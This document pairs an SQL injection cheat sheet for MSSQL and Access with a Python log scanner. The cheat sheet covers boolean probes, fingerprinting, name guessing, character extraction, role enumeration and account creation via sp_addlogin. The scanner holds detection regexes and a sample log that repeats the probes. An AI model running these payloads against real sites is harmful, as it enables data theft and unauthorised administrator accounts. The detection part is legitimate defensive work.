1. Check whether the parameter is injectable: ;and 1=1 ;and 1=2
2. Preliminary check for MSSQL: ;and user>0
3. When the injected parameter is a string: 'and [查询条件] and ''='
4. When a search parameter is not filtered: 'and [查询条件] and '%25'='
(Placeholders in the probes: [查询条件] is the query condition, 字段名 the column name, and 数据库名 the name of the table being queried.)
5. Determine the database system:
;and (select count(*) from sysobjects)>0   (mssql)
;and (select count(*) from msysobjects)>0   (access)
6. Guess the database (table) name: ;and (select Count(*) from [数据库名])>0
7. Guess the column name: ;and (select Count(字段名) from 数据库名)>0
8. Guess the length of a record in the column: ;and (select top 1 len(字段名) from 数据库名)>0
9. (1) Guess the ASCII value of the column (Access):
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2) Guess the ASCII value of the column (MSSQL):
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10. Test the permission structure (MSSQL):
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
11. Add MSSQL and system accounts:
;exec master.dbo.sp_addlogin username;--
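As an added defender-side example (not part of the original cheat sheet), the following Python scans constructed web-server access log lines for the probe stages listed above, decoding the query string twice so the %25 form from step 4 is recognised as the server would see it. The log format, paths and sample values are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Signatures for the probe stages listed on this page; they match the shape of
# each probe, not any particular table or column name.
SIGNATURES = {
    "boolean_probe":      re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),                  # step 1
    "mssql_user_probe":   re.compile(r"\band\s+user\s*>\s*0\b", re.I),                  # step 2
    "string_tautology":   re.compile(r"'\s*%?\s*'\s*=\s*'"),                             # steps 3-4
    "schema_fingerprint": re.compile(r"\bfrom\s+m?sysobjects\b", re.I),                 # step 5
    "char_bruteforce":    re.compile(r"\b(asc\s*\(\s*mid|unicode\s*\(\s*substring)\s*\(", re.I),  # step 9
    "role_enumeration":   re.compile(r"\bis_(srvrolemember|member)\s*\(", re.I),        # step 10
    "account_creation":   re.compile(r"\bsp_addlogin\b", re.I),                         # step 11
}

# Combined-format access log line (assumed layout): client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def normalise(query: str) -> str:
    """Decode twice so a %25-encoded probe (step 4) is seen the way the server sees it."""
    decoded = unquote(unquote(query.replace("+", " ")))
    return re.sub(r"\s+", " ", decoded)

def classify(query: str) -> list[str]:
    """Return the names of every probe stage whose pattern appears in a query string."""
    text = normalise(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan_log(lines) -> list[tuple[str, str, list[str]]]:
    """Return (client ip, path, stages) for each request that carries a probe."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("path").partition("?")
        stages = classify(query) if query else []
        if stages:
            findings.append((m.group("ip"), path, stages))
    return findings

# Constructed sample log (not real traffic): one benign request, then a probe sequence.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /news.asp?id=12%20and%201=1 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news.asp?id=12%20and%201=2 HTTP/1.1" 200 312
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /news.asp?id=12%20and%20(select%20count(*)%20from%20sysobjects)>0 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search.asp?q=book'%20and%20''='%25'=' HTTP/1.1" 200 900
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /news.asp?id=12%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'));-- HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /news.asp?id=12;exec%20master.dbo.sp_addlogin%20test;-- HTTP/1.1" 500 120
""".splitlines()
```

Run `scan_log(SAMPLE_LOG)` to see one finding per probing request; a client that moves from the boolean pair to role enumeration and sp_addlogin within seconds is the pattern to alert on.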